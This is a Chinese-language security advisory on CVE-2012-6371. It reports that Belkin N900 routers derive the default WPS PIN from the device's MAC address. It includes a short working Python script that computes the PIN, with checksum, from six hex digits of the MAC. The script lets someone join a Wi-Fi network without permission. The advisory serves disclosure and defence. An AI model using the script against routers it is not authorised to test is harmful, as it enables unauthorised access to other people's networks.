Belkin Wireless Router默认WPS PIN安全漏洞

Belkin Wireless Router默认WPS PIN安全漏洞

发布日期：2013-01-03
更新日期：2013-01-06

受影响系统：
Belkin Wireless Router Belkin N900 F9K1104v1
描述：
--------------------------------------------------------------------------------
BUGTRAQ  ID: 57128
 CVE(CAN) ID: CVE-2012-6371
 
Belkin Wireless Routers是美国贝尔金公司的无线路由器产品。
 
Belkin N900 F9K1104v1及其他版本在WPA2的实现上，用基于6位数字的LAN/WLAN MAC地址建立了WPS PIN，通过读取广播报文，远程攻击者可利用此漏洞访问Wi-Fi网络。
 
<*来源：ZhaoChunsheng （e.novellalorente@student.ru.nl）
 
  链接：http://ednolo.alumnos.upv.es/?p=1295
 *>

测试方法：
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！
@author      : e.novellalorente@student.ru.nl
 Original work : ZhaoChunsheng 04/07/2012

 '''

 import sys

 VERSION    = 0
 SUBVERSION = 2

 def usage():
    print "[+] WPSpin %d.%d " % (VERSION, SUBVERSION)
    print "[*] Usage : python WPSpin.py 123456"
    sys.exit(0)

 def wps_pin_checksum(pin):
    accum = 0

    while(pin):
        accum += 3 * (pin % 10)
        pin /= 10
        accum += pin % 10
        pin /= 10
    return  (10 - accum % 10) % 10

 try:
    if (len(sys.argv[1]) == 6):
        p = int(sys.argv[1] , 16) % 10000000
        print "[+] WPS pin is : %07d%d" % (p, wps_pin_checksum(p))
    else:
        usage()
 except Exception:
    usage()

建议：
--------------------------------------------------------------------------------
厂商补丁：
 
Belkin
 ------
 目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：
 
http://www.belkin.com/